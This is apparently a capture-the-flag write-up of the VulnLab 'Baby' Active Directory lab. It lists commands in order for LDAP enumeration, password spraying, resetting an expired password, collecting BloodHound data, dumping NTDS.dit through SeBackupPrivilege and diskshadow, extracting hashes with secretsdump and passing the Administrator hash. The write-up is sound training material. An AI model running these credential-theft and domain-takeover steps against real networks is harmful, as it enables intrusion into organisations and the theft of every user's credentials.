Baby Writeup (VulnLab)
An easy rated box on vulnlab, requiring LDAP enumeration and AD exploitation for root. Perfect for beginners exploring AD concepts.
NMAP Port Scan
Starting off with an NMAP Scan:
1
nmap -sS -sV -A --min-rate 2500 10.10.106.67
From the scan we are able to identify that this is a Domain Controller due to the services running such as LDAP & Kerberos. The scan also produces 2 DNS:
- BabyDC.baby.vl
- baby.vl
We can add this to our /etc/hosts file:
1
sudo nano /etc/hosts
Discovery of a password via LDAP
As LDAP was running on port 389, it is important to identify the naming context for further usage:
1
ldapsearch -H ldap://baby.vl -x -s base namingcontexts
Following the output, the part we are interested in is:
1
namingcontexts: DC=baby,DC=vl
We can use the naming context to craft further ldapsearch queries, such as searching for users:
1
ldapsearch -H ldap://baby.vl -x -b "DC=baby,DC=vl" '(objectClass=Person)' sAMAccountName description
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Guest, Users, baby.vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest
# Jacqueline Barnett, dev, baby.vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
sAMAccountName: Jacqueline.Barnett
# Ashley Webb, dev, baby.vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
sAMAccountName: Ashley.Webb
# Hugh George, dev, baby.vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
sAMAccountName: Hugh.George
# Leonard Dyer, dev, baby.vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
sAMAccountName: Leonard.Dyer
# Connor Wilkinson, it, baby.vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
sAMAccountName: Connor.Wilkinson
# Joseph Hughes, it, baby.vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
sAMAccountName: Joseph.Hughes
# Kerry Wilson, it, baby.vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
sAMAccountName: Kerry.Wilson
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
description: Set initial password to BabyStart123!
sAMAccountName: Teresa.Bell
# Caroline Robinson, it, baby.vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
sAMAccountName: Caroline.Robinson
After the ldapsearch query, all found users were appended into a users.txt wordlist. One user stands out with a description containing a password:
1
2
3
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
description: Set initial password to BabyStart123!
sAMAccountName: Teresa.Bell
Password spraying the domain controller
During LDAP Enumeration, Teresa.Bell was found to have a password in the user description, claiming that it is an initial password. To test if this password is correct and if other user’s still have the initial password set we can password spray the DC with crackmapexec:
1
crackmapexec smb BabyDC.baby.vl -u users.txt -p "BabyStart123\!"
Caroline.Robinson appeared to still be using the password, however crackmapexec presented an error ‘STATUS_PASSWORD_MUST_CHANGE’
Resetting the password with kinit
After some research, I stumbled upon a blog post which you can find here, describing how AD accounts can have their passwords reset remotely using kerberos.
To start we have to edit the /etc/krb5.conf file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[libdefaults]
default_realm = BABY.VL
dns_lookup_kdc = false
dns_lookup_realm = false
<SNIP>
[realms]
BABY.VL = {
kdc = 10.10.106.67
admin_server = 10.10.106.67
}
<SNIP>
[domain_realm]
.baby.vl = BABY.VL
Then we can send our requests using kinit to reset the password:
1
kinit -V Caroline.Robinson@BABY.VL
We changed the password had been changed to ‘PwnBaby1234’, to check that this went through correctly another crackmapexec smb logon request is made:
1
crackmapexec smb BabyDc.baby.vl -u "Caroline.Robinson" -p "PwnBaby1234"
Checking caroline’s groups & permissions
With access to a user account, we can utilise bloodhound to map out potential attack paths:
1
bloodhound-python -u "Caroline.Robinson" -p "PwnBaby1234" -ns 10.10.106.67 -d baby.vl
BloodHound-Python automatically gathered domain info, computer info, group info, user info and placed it all into JSON files. Now we have to upload the JSON to the bloodhound interface to get a visually pleasing view of the information: 
Following from the files being uploaded to the bloodhound web application, we are able to identify that Caroline is in the Backup Operators group: 
The bloodhound output showcased that caroline is part of the remote management users group, meaning that it will be possible to Evil-WinRM into the machine using the credentials:
1
evil-winrm -i BabyDC.baby.vl -u "Caroline.Robinson" -p "PwnBaby1234"
Now that we have a shell as caroline, we can check the privileges to potentially dump credentials:
1
whoami /priv
The privilege that stands out is:
1
SeBackupPrivilege Back up files and directories Enabled
Dumping domain credentials
Since we were able to identify that caroline is apart of the Backup Operators group & has SeBackupPrivilege enabled, the rest of the box should be relatively straight forward. We have to dump HKLM\System & NTDS.dit:
1
reg save hklm\system system.save
As we are not administrator yet, using vssadmin isn’t going to work. Researching ways to dump NTDS.dit lead to the discovery of this blog post. It describes how diskshadow can be used to copy the C:\ drive to eventually copy NTDS.dit.
First we have to create a text file:
1
2
3
4
5
6
set verbose on
set metadata C:\temp\shadowdata.cab
set context persistent
add volume C: alias shadowdrive
create
expose %shadowdrive% z:
Then upload the text file to our evil-winrm shell, make a new temp directory and execute diskshadow:
1
2
3
upload backup.txt
mkdir C:\temp
diskshadow /s backup.txt
We have to copy NTDS.dit from the newly created Z drive and then download both system.save and ntds.dit to our attacker machine:
1
2
3
robocopy /b z:\windows\ntds . ntds.dit
download system.save
download ntds.dit
Following from the download back to our attacker machine, we can utilise impacket-secretsdump to dump all domain credentials:
1
impacket-secretsdump -ntds ntds.dit -system system.save LOCAL
Getting a shell as Administrator
The domain admin’s NTLM has been dumped:
1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
We can now use evil-winrm pth to login:
1
evil-winrm -i BabyDc.baby.vl -u Administrator -H "ee4457ae59f1e3fbd764e33d9cef123d"












